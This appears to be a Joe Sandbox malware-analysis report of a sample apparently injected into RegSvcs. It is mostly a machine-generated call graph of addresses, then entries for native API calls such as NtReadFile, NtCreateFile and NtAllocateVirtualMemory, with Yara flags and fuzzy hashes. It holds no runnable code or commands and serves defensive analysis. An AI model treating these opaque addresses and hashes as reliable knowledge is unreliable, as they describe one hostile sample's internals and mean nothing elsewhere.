41bfa8 99542->99544 99555 41a630 99542->99555 99544->99517 99546 41a42c NtReadFile 99545->99546 99547 41af60 LdrLoadDll 99545->99547 99546->99518 99547->99546 99549 41bbb4 99548->99549 99550 41bb9d 99548->99550 99549->99528 99550->99549 99551 41bf90 2 API calls 99550->99551 99552 41bbcb 99551->99552 99552->99528 99553->99522 99554->99507 99556 41af60 LdrLoadDll 99555->99556 99557 41a64c RtlAllocateHeap 99556->99557 99557->99544 99688 41a540 99558->99688 99560 41bd6d 99560->99448 99562 414081 99561->99562 99564 414089 99561->99564 99562->99451 99563 41435c 99563->99451 99564->99563 99691 41cf30 99564->99691 99566 4140dd 99567 41cf30 2 API calls 99566->99567 99571 4140e8 99567->99571 99568 414136 99570 41cf30 2 API calls 99568->99570 99574 41414a 99570->99574 99571->99568 99572 41d060 3 API calls 99571->99572 99702 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 99571->99702 99572->99571 99573 4141a7 99575 41cf30 2 API calls 99573->99575 99574->99573 99696 41d060 99574->99696 99577 4141bd 99575->99577 99578 4141fa 99577->99578 99580 41d060 3 API calls 99577->99580 99579 41cf30 2 API calls 99578->99579 99581 414205 99579->99581 99580->99577 99582 41d060 3 API calls 99581->99582 99588 41423f 99581->99588 99582->99581 99584 414334 99704 41cf90 LdrLoadDll RtlFreeHeap 99584->99704 99586 41433e 99705 41cf90 LdrLoadDll RtlFreeHeap 99586->99705 99703 41cf90 LdrLoadDll RtlFreeHeap 99588->99703 99589 414348 99706 41cf90 LdrLoadDll RtlFreeHeap 99589->99706 99591 414352 99707 41cf90 LdrLoadDll RtlFreeHeap 99591->99707 99594 4153a1 99593->99594 99595 414a50 8 API calls 99594->99595 99596 4153b7 99595->99596 99597 4153f2 99596->99597 99598 415405 99596->99598 99601 41540a 99596->99601 99600 41bdc0 2 API calls 99597->99600 99599 41bdc0 2 API calls 99598->99599 99599->99601 99602 4153f7 99600->99602 99601->99455 99602->99455 99604 41ad84 99603->99604 99605 41ac30 LdrLoadDll 99603->99605 99708 41ac30 99604->99708 99605->99604 99608 41ac30 LdrLoadDll 99609 41ad96 99608->99609 99610 41ac30 LdrLoadDll 99609->99610 99611 41ad9f 99610->99611 99612 41ac30 LdrLoadDll 99611->99612 99613 41ada8 99612->99613 99614 41ac30 LdrLoadDll 99613->99614 99615 41adb1 99614->99615 99616 41ac30 LdrLoadDll 99615->99616 99617 41adbd 99616->99617 99618 41ac30 LdrLoadDll 99617->99618 99619 41adc6 99618->99619 99620 41ac30 LdrLoadDll 99619->99620 99621 41adcf 99620->99621 99622 41ac30 LdrLoadDll 99621->99622 99623 41add8 99622->99623 99624 41ac30 LdrLoadDll 99623->99624 99625 41ade1 99624->99625 99626 41ac30 LdrLoadDll 99625->99626 99627 41adea 99626->99627 99628 41ac30 LdrLoadDll 99627->99628 99629 41adf6 99628->99629 99630 41ac30 LdrLoadDll 99629->99630 99631 41adff 99630->99631 99632 41ac30 LdrLoadDll 99631->99632 99633 41ae08 99632->99633 99634 41ac30 LdrLoadDll 99633->99634 99635 41ae11 99634->99635 99636 41ac30 LdrLoadDll 99635->99636 99637 41ae1a 99636->99637 99638 41ac30 LdrLoadDll 99637->99638 99639 41ae23 99638->99639 99640 41ac30 LdrLoadDll 99639->99640 99641 41ae2f 99640->99641 99642 41ac30 LdrLoadDll 99641->99642 99643 41ae38 99642->99643 99644 41ac30 LdrLoadDll 99643->99644 99645 41ae41 99644->99645 99646 41ac30 LdrLoadDll 99645->99646 99647 41ae4a 99646->99647 99648 41ac30 LdrLoadDll 99647->99648 99649 41ae53 99648->99649 99650 41ac30 LdrLoadDll 99649->99650 99651 41ae5c 99650->99651 99652 41ac30 LdrLoadDll 99651->99652 99653 41ae68 99652->99653 99654 41ac30 LdrLoadDll 99653->99654 99655 41ae71 99654->99655 99656 41ac30 LdrLoadDll 99655->99656 99657 41ae7a 99656->99657 99658 41ac30 LdrLoadDll 99657->99658 99659 41ae83 99658->99659 99660 41ac30 LdrLoadDll 99659->99660 99661 41ae8c 99660->99661 99662 41ac30 LdrLoadDll 99661->99662 99663 41ae95 99662->99663 99664 41ac30 LdrLoadDll 99663->99664 99665 41aea1 99664->99665 99666 41ac30 LdrLoadDll 99665->99666 99667 41aeaa 99666->99667 99668 41ac30 LdrLoadDll 99667->99668 99669 41aeb3 99668->99669 99670 41ac30 LdrLoadDll 99669->99670 99671 41aebc 99670->99671 99672 41ac30 LdrLoadDll 99671->99672 99673 41aec5 99672->99673 99674 41ac30 LdrLoadDll 99673->99674 99675 41aece 99674->99675 99676 41ac30 LdrLoadDll 99675->99676 99677 41aeda 99676->99677 99678 41ac30 LdrLoadDll 99677->99678 99679 41aee3 99678->99679 99680 41ac30 LdrLoadDll 99679->99680 99681 41aeec 99680->99681 99681->99459 99683 41af60 LdrLoadDll 99682->99683 99684 419edc 99683->99684 99714 18a2df0 LdrInitializeThunk 99684->99714 99685 419ef3 99685->99379 99687->99456 99689 41af60 LdrLoadDll 99688->99689 99690 41a55c NtAllocateVirtualMemory 99689->99690 99690->99560 99692 41cf40 99691->99692 99693 41cf46 99691->99693 99692->99566 99694 41bf90 2 API calls 99693->99694 99695 41cf6c 99694->99695 99695->99566 99697 41cfd0 99696->99697 99698 41d02d 99697->99698 99699 41bf90 2 API calls 99697->99699 99698->99574 99700 41d00a 99699->99700 99701 41bdc0 2 API calls 99700->99701 99701->99698 99702->99571 99703->99584 99704->99586 99705->99589 99706->99591 99707->99563 99709 41ac4b 99708->99709 99710 414e50 LdrLoadDll 99709->99710 99711 41ac6b 99710->99711 99712 414e50 LdrLoadDll 99711->99712 99713 41ad17 99711->99713 99712->99713 99713->99608 99714->99685 99716 18a2c1f LdrInitializeThunk 99715->99716 99717 18a2c11 99715->99717 99716->99465 99717->99465 99719 41af60 LdrLoadDll 99718->99719 99720 41a68c RtlFreeHeap 99719->99720 99720->99469 99722 407eb0 99721->99722 99723 407eab 99721->99723 99724 41bd40 2 API calls 99722->99724 99723->99387 99727 407ed5 99724->99727 99725 407f38 99725->99387 99726 419ec0 2 API calls 99726->99727 99727->99725 99727->99726 99728 407f3e 99727->99728 99733 41bd40 2 API calls 99727->99733 99737 41a5c0 99727->99737 99729 407f64 99728->99729 99731 41a5c0 2 API calls 99728->99731 99729->99387 99732 407f55 99731->99732 99732->99387 99733->99727 99735 41a5c0 2 API calls 99734->99735 99736 40817e 99735->99736 99736->99348 99738 41af60 LdrLoadDll 99737->99738 99739 41a5dc 99738->99739 99742 18a2c70 LdrInitializeThunk 99739->99742 99740 41a5f3 99740->99727 99742->99740 99744 41b5c3 99743->99744 99747 40acf0 99744->99747 99748 40ad14 99747->99748 99749 40ad50 LdrLoadDll 99748->99749 99750 409c4a 99748->99750 99749->99750 99750->99354 99752 40b063 99751->99752 99752->99752 99754 40b0e0 99752->99754 99766 419c90 LdrLoadDll 99752->99766 99754->99361 99756 41af60 LdrLoadDll 99755->99756 99757 40f1bb 99756->99757 99757->99369 99758 41a7d0 99757->99758 99759 41a7ef LookupPrivilegeValueW 99758->99759 99760 41af60 LdrLoadDll 99758->99760 99759->99365 99760->99759 99762 41a27c 99761->99762 99763 41af60 LdrLoadDll 99761->99763 99767 18a2ea0 LdrInitializeThunk 99762->99767 99763->99762 99764 41a29b 99764->99368 99766->99754 99767->99764 99769 40b1f0 99768->99769 99770 40b040 LdrLoadDll 99769->99770 99771 40b204 99770->99771 99771->99303 99773 40ae51 99772->99773 99774 40ae4d 99772->99774 99775 40ae9c 99773->99775 99778 40ae6a 99773->99778 99774->99305 99820 419cd0 LdrLoadDll 99775->99820 99777 40aead 99777->99305 99819 419cd0 LdrLoadDll 99778->99819 99780 40ae8c 99780->99305 99782 40f4a0 3 API calls 99781->99782 99783 4143c6 99781->99783 99782->99783 99783->99307 99821 4087a0 99784->99821 99786 408a9d 99786->99309 99788 4087a0 19 API calls 99789 408a8a 99788->99789 99789->99786 99839 40f710 10 API calls 99789->99839 99792 41af60 LdrLoadDll 99791->99792 99793 41a51c 99792->99793 99958 18a2e80 LdrInitializeThunk 99793->99958 99794 40c322 99796 40f4a0 99794->99796 99797 40f4bd 99796->99797 99959 419fc0 99797->99959 99800 40f505 99800->99313 99801 41a010 2 API calls 99802 40f52e 99801->99802 99802->99313 99804 41a016 99803->99804 99805 41af60 LdrLoadDll 99804->99805 99806 41a02c 99805->99806 99965 18a2d10 LdrInitializeThunk 99806->99965 99807 40c385 99807->99319 99807->99322 99810 41af60 LdrLoadDll 99809->99810 99811 41a07c 99810->99811 99966 18a2d30 LdrInitializeThunk 99811->99966 99812 40c459 99812->99330 99815 41af60 LdrLoadDll 99814->99815 99816 419e3c 99815->99816 99967 18a2fb0 LdrInitializeThunk 99816->99967 99817 40c4ac 99817->99334 99819->99780 99820->99777 99822 407ea0 4 API calls 99821->99822 99837 4087ba 99822->99837 99823 408a49 99823->99786 99823->99788 99824 408a3f 99825 408160 2 API calls 99824->99825 99825->99823 99828 419f00 2 API calls 99828->99837 99830 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99830->99837 99831 41a490 LdrLoadDll NtClose 99831->99837 99836 419e20 2 API calls 99836->99837 99837->99823 99837->99824 99837->99828 99837->99830 99837->99831 99837->99836 99840 419d10 99837->99840 99843 4085d0 99837->99843 99855 40f5f0 LdrLoadDll NtClose 99837->99855 99856 419d90 LdrLoadDll 99837->99856 99857 419dc0 LdrLoadDll 99837->99857 99858 419e50 LdrLoadDll 99837->99858 99859 4083a0 99837->99859 99875 405f60 LdrLoadDll 99837->99875 99839->99786 99841 419d2c 99840->99841 99842 41af60 LdrLoadDll 99840->99842 99841->99837 99842->99841 99844 4085e6 99843->99844 99846 4085ff 99844->99846 99876 419880 99844->99876 99851 408771 99846->99851 99897 4081a0 99846->99897 99848 4086e5 99849 4083a0 11 API calls 99848->99849 99848->99851 99850 408713 99849->99850 99850->99851 99852 419f00 2 API calls 99850->99852 99851->99837 99853 408748 99852->99853 99853->99851 99854 41a500 2 API calls 99853->99854 99854->99851 99855->99837 99856->99837 99857->99837 99858->99837 99860 4083c9 99859->99860 99937 408310 99860->99937 99863 41a500 2 API calls 99864 4083dc 99863->99864 99864->99863 99865 408467 99864->99865 99867 408462 99864->99867 99945 40f670 99864->99945 99865->99837 99866 41a490 2 API calls 99868 40849a 99866->99868 99867->99866 99868->99865 99869 419d10 LdrLoadDll 99868->99869 99870 4084ff 99869->99870 99870->99865 99949 419d50 99870->99949 99872 408563 99872->99865 99873 414a50 8 API calls 99872->99873 99874 4085b8 99873->99874 99874->99837 99875->99837 99877 41bf90 2 API calls 99876->99877 99878 419897 99877->99878 99904 409310 99878->99904 99880 4198b2 99881 4198f0 99880->99881 99882 4198d9 99880->99882 99885 41bd40 2 API calls 99881->99885 99883 41bdc0 2 API calls 99882->99883 99884 4198e6 99883->99884 99884->99846 99886 41992a 99885->99886 99887 41bd40 2 API calls 99886->99887 99889 419943 99887->99889 99894 419be4 99889->99894 99910 41bd80 99889->99910 99891 419bd0 99892 41bdc0 2 API calls 99891->99892 99893 419bda 99892->99893 99893->99846 99895 41bdc0 2 API calls 99894->99895 99896 419c39 99895->99896 99896->99846 99898 40829f 99897->99898 99900 4081b5 99897->99900 99898->99848 99899 414a50 8 API calls 99901 408222 99899->99901 99900->99898 99900->99899 99902 41bdc0 2 API calls 99901->99902 99903 408249 99901->99903 99902->99903 99903->99848 99905 409335 99904->99905 99906 40acf0 LdrLoadDll 99905->99906 99907 409368 99906->99907 99909 40938d 99907->99909 99913 40cf20 99907->99913 99909->99880 99911 419bc9 99910->99911 99931 41a580 99910->99931 99911->99891 99911->99894 99914 40cf4c 99913->99914 99915 41a1e0 LdrLoadDll 99914->99915 99916 40cf65 99915->99916 99917 40cf6c 99916->99917 99924 41a220 99916->99924 99917->99909 99921 40cfa7 99922 41a490 2 API calls 99921->99922 99923 40cfca 99922->99923 99923->99909 99925 41af60 LdrLoadDll 99924->99925 99926 41a23c 99925->99926 99930 18a2ca0 LdrInitializeThunk 99926->99930 99927 40cf8f 99927->99917 99929 41a810 LdrLoadDll 99927->99929 99929->99921 99930->99927 99932 41af60 LdrLoadDll 99931->99932 99933 41a59c 99932->99933 99936 18a2f90 LdrInitializeThunk 99933->99936 99934 41a5b7 99934->99911 99936->99934 99938 408328 99937->99938 99939 40acf0 LdrLoadDll 99938->99939 99940 408343 99939->99940 99941 414e50 LdrLoadDll 99940->99941 99942 408353 99941->99942 99943 40835c PostThreadMessageW 99942->99943 99944 408370 99942->99944 99943->99944 99944->99864 99946 40f683 99945->99946 99952 419e90 99946->99952 99950 41af60 LdrLoadDll 99949->99950 99951 419d6c 99950->99951 99951->99872 99953 419eac 99952->99953 99954 41af60 LdrLoadDll 99952->99954 99957 18a2dd0 LdrInitializeThunk 99953->99957 99954->99953 99955 40f6ae 99955->99864 99957->99955 99958->99794 99960 41af60 LdrLoadDll 99959->99960 99961 419fdc 99960->99961 99964 18a2f30 LdrInitializeThunk 99961->99964 99962 40f4fe 99962->99800 99962->99801 99964->99962 99965->99807 99966->99812 99967->99817 99968 18a2ad0 LdrInitializeThunk

                                            Executed Functions

                                            Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            • Opcode ID: a7eca75e32f3bedc7f05746b1ab66bcae00299feea27d4f1c67943bcdc7498c0
                                            • Instruction ID: 6fb213b5ecae9b2d78436e96d981fe4cc20fd8036c0d356658e2c76b782acd04
                                            • Opcode Fuzzy Hash: a7eca75e32f3bedc7f05746b1ab66bcae00299feea27d4f1c67943bcdc7498c0
                                            • Instruction Fuzzy Hash: F0F0F4B2200118ABCB08DF99DC80EEB77ADEF8C754F158248BE0D97241D630E811CBA0
                                            Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                            Function 0041A3B2 Relevance: 1.6, APIs: 1, Instructions: 57filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 208 41a3b2-41a3b6 209 41a3b8-41a3d6 208->209 210 41a39c-41a3b1 NtCreateFile 208->210 212 41a3dc-41a409 209->212 213 41a3d7 call 41af60 209->213 213->212
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: ee52b71bc56ba8f75eac640c797a2694eba69458283401c77e7ab256cfbac458
                                            • Instruction ID: a7a1a1cfa9bd20287bf16b9f77af049775cbda1b728cc0b5c91c8d781c512f10
                                            • Opcode Fuzzy Hash: ee52b71bc56ba8f75eac640c797a2694eba69458283401c77e7ab256cfbac458
                                            • Instruction Fuzzy Hash: E001EDB6200108AFCB08DF99DC84DEB77ADEF8C724F158659FA1D97290C630E951CBA4
                                            Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 245 40acf0-40ad0c 246 40ad14-40ad19 245->246 247 40ad0f call 41cc50 245->247 248 40ad1b-40ad1e 246->248 249 40ad1f-40ad2d call 41d070 246->249 247->246 252 40ad3d-40ad4e call 41b4a0 249->252 253 40ad2f-40ad3a call 41d2f0 249->253 258 40ad50-40ad64 LdrLoadDll 252->258 259 40ad67-40ad6a 252->259 253->252 258->259
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                            Function 0041A35B Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 266 41a35b-41a3b1 call 41af60 NtCreateFile
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 6695f46d939826041cc326eafd9aa07fd4365e6bc78657eca3727a353c5cfd4f
                                            • Instruction ID: f7f4107286774cdf51585c7b95314371371209a0b209ae894d56bd91292c74bc
                                            • Opcode Fuzzy Hash: 6695f46d939826041cc326eafd9aa07fd4365e6bc78657eca3727a353c5cfd4f
                                            • Instruction Fuzzy Hash: 2801B2B2201108AFCB58DF99DC95EEB77A9EF8C754F158248FA0DD7241D630E851CBA4
                                            Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 270 41a360-41a376 271 41a37c-41a3b1 NtCreateFile 270->271 272 41a377 call 41af60 270->272 272->271
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                            Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 274 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                            Function 0041A48B Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 862ab1d74fd6b39137587eef0b780224c3788b65532d327abcc0014471138fb9
                                            • Instruction ID: b3fdf63f4ad5ff6f1f79f001bf06b592d21b89135aeb14a04be9777f4d5fd233
                                            • Opcode Fuzzy Hash: 862ab1d74fd6b39137587eef0b780224c3788b65532d327abcc0014471138fb9
                                            • Instruction Fuzzy Hash: EAE08C712402046BD710EB98CC46FA73BA8EF88724F248499BA0C5B242C131E90187D0
                                            Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                            Function 018A2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 47f58f72c80b1f52cd17e4b10c0dbfe5d830b2d6565d7424dcb9085cfd16a102
                                            • Instruction ID: f9adcfa4a9e199f55b546c9bcd4e6d4cb41f557cb011ef34981696b50b52a31b
                                            • Opcode Fuzzy Hash: 47f58f72c80b1f52cd17e4b10c0dbfe5d830b2d6565d7424dcb9085cfd16a102
                                            • Instruction Fuzzy Hash: 4D90023120140806D1807158484468A000997D2301F95D015A102A664DCA158B5D7BA2
                                            Function 018A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ac4491c87aeb6f8064f7327b81f317d5a38c56fee2231f9be21d3b0f38627fbb
                                            • Instruction ID: 3b85241cecb80621df7b3796b99abaca6bc6a484eea2c756a01cfa445492cfea
                                            • Opcode Fuzzy Hash: ac4491c87aeb6f8064f7327b81f317d5a38c56fee2231f9be21d3b0f38627fbb
                                            • Instruction Fuzzy Hash: FF90026120240007410571584854656400E97E1301B55D021E20195A0DC5258A996626
                                            Function 018A2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e3c247444864a281cfcc63b3da29ac24e82777d9c1ff5d54048db88102837512
                                            • Instruction ID: d505e9827c6a0bdeb685b6cf2b579e46504ac82849b5706ef98737e292f67296
                                            • Opcode Fuzzy Hash: e3c247444864a281cfcc63b3da29ac24e82777d9c1ff5d54048db88102837512
                                            • Instruction Fuzzy Hash: 2F900225211400070105B5580B44547004A97D6351355D021F201A560CD6218A695622
                                            Function 018A2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8c6090c702074e7600f7667a967b775902eced5628729783ea5a6b4b55a294d6
                                            • Instruction ID: 0209eb781f89321a2850b295600e24ef9143722ba5dc988b414084c96e05862c
                                            • Opcode Fuzzy Hash: 8c6090c702074e7600f7667a967b775902eced5628729783ea5a6b4b55a294d6
                                            • Instruction Fuzzy Hash: 48900221242441565545B1584844547400AA7E1341795D012A2419960CC5269A5EDB22
                                            Function 018A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b4df249603d58f4c736b87e5000de2278b833fa1d8f8864bbb239cf8b2ea3a37
                                            • Instruction ID: 89399dd77b01d1a2ed3287ca3b68f0d41036dc7a837a45b958329c49afcd58ca
                                            • Opcode Fuzzy Hash: b4df249603d58f4c736b87e5000de2278b833fa1d8f8864bbb239cf8b2ea3a37
                                            • Instruction Fuzzy Hash: 8A90023120140417D11171584944747000D97D1341F95D412A1429568DD6568B5AA622
